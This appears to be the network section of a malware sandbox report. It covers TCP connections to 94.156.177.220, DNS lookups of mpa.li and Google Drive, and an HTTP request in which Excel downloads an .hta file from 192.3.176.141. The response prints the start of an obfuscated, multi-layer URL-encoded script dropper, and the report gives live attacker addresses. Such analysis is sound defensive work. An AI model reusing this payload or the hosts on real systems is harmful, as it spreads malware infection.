                                                                                              Oct 24, 2024 21:23:46.791759968 CEST4918580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:46.858269930 CEST804918494.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:46.858283043 CEST804918494.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:46.858460903 CEST4918480192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:46.868570089 CEST804918494.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:46.868592024 CEST804918594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:46.868747950 CEST4918580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:46.874614954 CEST4918580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:46.883161068 CEST804918594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:46.883325100 CEST4918580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:46.890700102 CEST804918594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:47.965843916 CEST804918594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:47.970541954 CEST4918580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:47.977145910 CEST804918594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:47.977216005 CEST4918580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:48.392695904 CEST4918680192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:48.398964882 CEST804918694.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:48.399036884 CEST4918680192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:48.401350975 CEST4918680192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:48.406747103 CEST804918694.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:48.406791925 CEST4918680192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:48.412154913 CEST804918694.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:49.409387112 CEST804918694.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:49.409575939 CEST4918680192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:49.415575981 CEST804918694.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:49.415693998 CEST4918680192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:49.553117990 CEST4918780192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:49.558657885 CEST804918794.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:49.558751106 CEST4918780192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:49.560369015 CEST4918780192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:49.566589117 CEST804918794.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:49.566653013 CEST4918780192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:49.572820902 CEST804918794.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:50.569111109 CEST804918794.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:50.569417953 CEST4918780192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:50.575297117 CEST804918794.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:50.575372934 CEST4918780192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:50.739213943 CEST4918880192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:50.744702101 CEST804918894.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:50.744769096 CEST4918880192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:50.746375084 CEST4918880192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:50.751825094 CEST804918894.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:50.751878023 CEST4918880192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:50.757452011 CEST804918894.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:51.776329041 CEST804918894.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:51.776490927 CEST4918880192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:51.783241987 CEST804918894.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:51.783391953 CEST4918880192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:51.948210001 CEST4918980192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:51.953680038 CEST804918994.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:51.953922987 CEST4918980192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:51.955508947 CEST4918980192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:51.960902929 CEST804918994.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:51.961137056 CEST4918980192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:51.966820955 CEST804918994.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:53.031290054 CEST804918994.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:53.031404972 CEST4918980192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:53.037215948 CEST804918994.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:53.037280083 CEST4918980192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:53.233946085 CEST4919080192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:53.497740030 CEST804919094.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:53.497843981 CEST4919080192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:53.499456882 CEST4919080192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:53.505244017 CEST804919094.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:53.505309105 CEST4919080192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:53.510729074 CEST804919094.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:55.553410053 CEST804919094.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:55.553591967 CEST4919080192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:55.559391022 CEST804919094.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:55.559469938 CEST4919080192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:55.712501049 CEST4919180192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:55.717974901 CEST804919194.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:55.718048096 CEST4919180192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:55.720447063 CEST4919180192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:55.726026058 CEST804919194.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:55.726103067 CEST4919180192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:55.731861115 CEST804919194.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:56.808187962 CEST804919194.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:56.808264971 CEST4919180192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:56.814340115 CEST804919194.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:56.814393044 CEST4919180192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:56.959609985 CEST4919280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:56.965219021 CEST804919294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:56.965289116 CEST4919280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:56.966893911 CEST4919280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:56.972305059 CEST804919294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:56.972372055 CEST4919280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:56.977768898 CEST804919294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:59.106962919 CEST804919294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:59.107069016 CEST4919280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:59.107737064 CEST804919294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:59.107793093 CEST4919280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:59.107824087 CEST804919294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:59.107873917 CEST4919280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:59.108335018 CEST804919294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:59.108381987 CEST4919280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:59.113439083 CEST804919294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:59.113451958 CEST804919294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:59.113488913 CEST4919280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:59.262439966 CEST4919380192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:59.267873049 CEST804919394.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:59.267949104 CEST4919380192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:59.269597054 CEST4919380192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:59.275003910 CEST804919394.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:23:59.275065899 CEST4919380192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:23:59.280869961 CEST804919394.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:00.322951078 CEST804919394.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:00.323075056 CEST4919380192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:00.329943895 CEST804919394.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:00.330012083 CEST4919380192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:00.453836918 CEST4919480192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:00.642261028 CEST804919494.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:00.642374039 CEST4919480192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:00.657490969 CEST4919480192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:00.662857056 CEST804919494.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:00.662976027 CEST4919480192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:00.668365955 CEST804919494.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:01.787553072 CEST804919494.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:01.787704945 CEST4919480192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:01.793729067 CEST804919494.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:01.793833017 CEST4919480192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:01.914833069 CEST4919580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:01.920275927 CEST804919594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:01.920362949 CEST4919580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:01.921905041 CEST4919580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:01.927402973 CEST804919594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:01.927480936 CEST4919580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:01.932975054 CEST804919594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:03.086314917 CEST804919594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:03.086400986 CEST4919580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:03.093209982 CEST804919594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:03.093281984 CEST4919580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:03.248204947 CEST4919680192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:03.253742933 CEST804919694.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:03.253806114 CEST4919680192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:03.255458117 CEST4919680192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:03.260883093 CEST804919694.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:03.260935068 CEST4919680192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:03.266417027 CEST804919694.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:04.455794096 CEST804919694.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:04.455921888 CEST4919680192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:04.456209898 CEST804919694.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:04.456254005 CEST4919680192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:04.461369991 CEST804919694.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:04.901882887 CEST4919780192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:04.907578945 CEST804919794.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:04.907696009 CEST4919780192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:04.909286976 CEST4919780192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:04.915967941 CEST804919794.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:04.916021109 CEST4919780192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:04.921550035 CEST804919794.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:07.129631042 CEST804919794.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:07.129726887 CEST4919780192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:07.135689974 CEST804919794.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:07.135757923 CEST4919780192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:07.345247030 CEST4919880192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:07.350755930 CEST804919894.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:07.350810051 CEST4919880192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:07.352407932 CEST4919880192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:07.357922077 CEST804919894.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:07.357975006 CEST4919880192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:07.363687038 CEST804919894.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:08.466027021 CEST804919894.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:08.466124058 CEST4919880192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:08.472218037 CEST804919894.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:08.472287893 CEST4919880192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:08.598411083 CEST4919980192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:08.604269981 CEST804919994.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:08.604347944 CEST4919980192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:08.605921030 CEST4919980192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:08.611371994 CEST804919994.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:08.611452103 CEST4919980192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:08.617224932 CEST804919994.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:09.780390024 CEST804919994.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:09.780519962 CEST4919980192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:09.786398888 CEST804919994.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:09.786462069 CEST4919980192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:10.042963982 CEST4920080192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:10.048487902 CEST804920094.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:10.048547029 CEST4920080192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:10.050141096 CEST4920080192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:10.055634975 CEST804920094.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:10.055685043 CEST4920080192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:10.062429905 CEST804920094.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:14.272247076 CEST804920094.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:14.272409916 CEST4920080192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:14.278170109 CEST804920094.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:14.278217077 CEST4920080192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:14.414475918 CEST4920180192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:14.419914007 CEST804920194.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:14.419986963 CEST4920180192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:14.421621084 CEST4920180192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:14.427457094 CEST804920194.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:14.427514076 CEST4920180192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:14.433092117 CEST804920194.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:15.557713032 CEST804920194.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:15.557828903 CEST4920180192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:15.563775063 CEST804920194.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:15.563854933 CEST4920180192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:15.719069958 CEST4920280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:15.724710941 CEST804920294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:15.724883080 CEST4920280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:15.726511002 CEST4920280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:15.731833935 CEST804920294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:15.731889009 CEST4920280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:15.737225056 CEST804920294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:16.929487944 CEST804920294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:16.929589987 CEST4920280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:16.936122894 CEST804920294.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:16.936181068 CEST4920280192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:17.087064028 CEST4920380192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:17.092426062 CEST804920394.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:17.092508078 CEST4920380192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:17.094152927 CEST4920380192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:17.099478960 CEST804920394.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:17.099666119 CEST4920380192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:17.104985952 CEST804920394.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:18.131926060 CEST804920394.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:18.132065058 CEST4920380192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:18.138995886 CEST804920394.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:18.139065981 CEST4920380192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:18.276009083 CEST4920480192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:18.281733036 CEST804920494.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:18.281810999 CEST4920480192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:18.283521891 CEST4920480192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:18.288844109 CEST804920494.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:18.288921118 CEST4920480192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:18.294306040 CEST804920494.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:19.432138920 CEST804920494.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:19.432343006 CEST4920480192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:19.438432932 CEST804920494.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:19.438500881 CEST4920480192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:19.572053909 CEST4920580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:19.577728987 CEST804920594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:19.577783108 CEST4920580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:19.579586983 CEST4920580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:19.584975958 CEST804920594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:19.585022926 CEST4920580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:19.590840101 CEST804920594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:20.593719959 CEST804920594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:20.593841076 CEST4920580192.168.2.2294.156.177.220
                                                                                              Oct 24, 2024 21:24:20.599685907 CEST804920594.156.177.220192.168.2.22
                                                                                              Oct 24, 2024 21:24:20.599745989 CEST4920580192.168.2.2294.156.177.220
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Oct 24, 2024 21:22:35.327449083 CEST5456253192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 21:22:35.347071886 CEST53545628.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 21:22:40.920448065 CEST5291753192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 21:22:40.942683935 CEST53529178.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 21:23:00.587378025 CEST6275153192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 21:23:00.597500086 CEST53627518.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 21:23:02.042622089 CEST5789353192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 21:23:02.054250956 CEST53578938.8.8.8192.168.2.22
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Oct 24, 2024 21:22:35.327449083 CEST192.168.2.228.8.8.80xa298Standard query (0)mpa.liA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 21:22:40.920448065 CEST192.168.2.228.8.8.80xd610Standard query (0)mpa.liA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 21:23:00.587378025 CEST192.168.2.228.8.8.80xbf62Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 21:23:02.042622089 CEST192.168.2.228.8.8.80xf308Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Oct 24, 2024 21:22:35.347071886 CEST8.8.8.8192.168.2.220xa298No error (0)mpa.li5.159.62.244A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 21:22:35.347071886 CEST8.8.8.8192.168.2.220xa298No error (0)mpa.li5.159.62.243A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 21:22:40.942683935 CEST8.8.8.8192.168.2.220xd610No error (0)mpa.li5.159.62.243A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 21:22:40.942683935 CEST8.8.8.8192.168.2.220xd610No error (0)mpa.li5.159.62.244A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 21:23:00.597500086 CEST8.8.8.8192.168.2.220xbf62No error (0)drive.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 21:23:02.054250956 CEST8.8.8.8192.168.2.220xf308No error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false
                                                                                              • mpa.li
                                                                                              • drive.google.com
                                                                                              • drive.usercontent.google.com
                                                                                              • 192.3.176.141
                                                                                              • 94.156.177.220
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.2249164192.3.176.141803596C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:22:36.997385979 CEST382OUTGET /35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta HTTP/1.1
                                                                                              Accept: */*
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: 192.3.176.141
                                                                                              Connection: Keep-Alive
                                                                                              Oct 24, 2024 21:22:37.664978981 CEST1236INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 19:22:36 GMT
                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                              Last-Modified: Thu, 24 Oct 2024 00:36:51 GMT
                                                                                              ETag: "20a11-6252e32d56015"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 133649
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/hta
                                                                                              Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 68 74 6d 6c 25 32 35 [TRUNCATED]
                                                                                              Data Ascii: <script>...document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CScriPT%252520LAnGuAGE%25253D%252522VbSCriPT%252522%25253E%25250ADIM%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                              Oct 24, 2024 21:22:37.665040016 CEST1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                              Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
